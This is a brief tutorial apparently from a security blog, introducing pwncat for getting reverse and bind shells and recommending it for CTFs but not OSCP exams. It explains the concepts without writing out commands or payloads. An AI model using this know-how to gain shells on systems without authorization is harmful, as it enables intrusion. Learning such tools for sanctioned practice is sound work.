pwncat Basics

pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform.

The basic mode of pwncat

• In Terminal Mode: It acts as a normal terminal that we obtain by a reverse shell.
• In pwncat CLI (command-line interface) Mode: Here, we will get all other special features that pwncat has to offer. 

Ctrl + D helps you to move between both modes.

Establishing a bind shell

A bind shell is a type of shell in which the target machine opens up a connection port or listener on the victim machine and waits for an incoming connection. Here the target machine is waiting for a connection and as soon as the connection is active. It executes /bin/bash which gives the attacker access to the victim's machine. 

Bind Shell Comparison

Establishing a reverse shell

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the localhost. Here we can see that just like netcat we can receive connections by using -lp which means listening on a port. But the shell that we obtain has much more features than an ordinary shell that we get with the help of netcat.

Reverse Shell Comparision

All kinds of connections are possible via pwncat

Connection Example

pwncat is a good tool in a CTF-like environment but make sure you do not use it in exams like OSCP because the automation capabilities such as privilege escalation to other users with just a command and auto enumeration are marked as illegal by offensive security. In CTF pwncat is a much better tool than netcat.

CLICK HERE TO KNOW MORE ABOUT PWNCAT

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.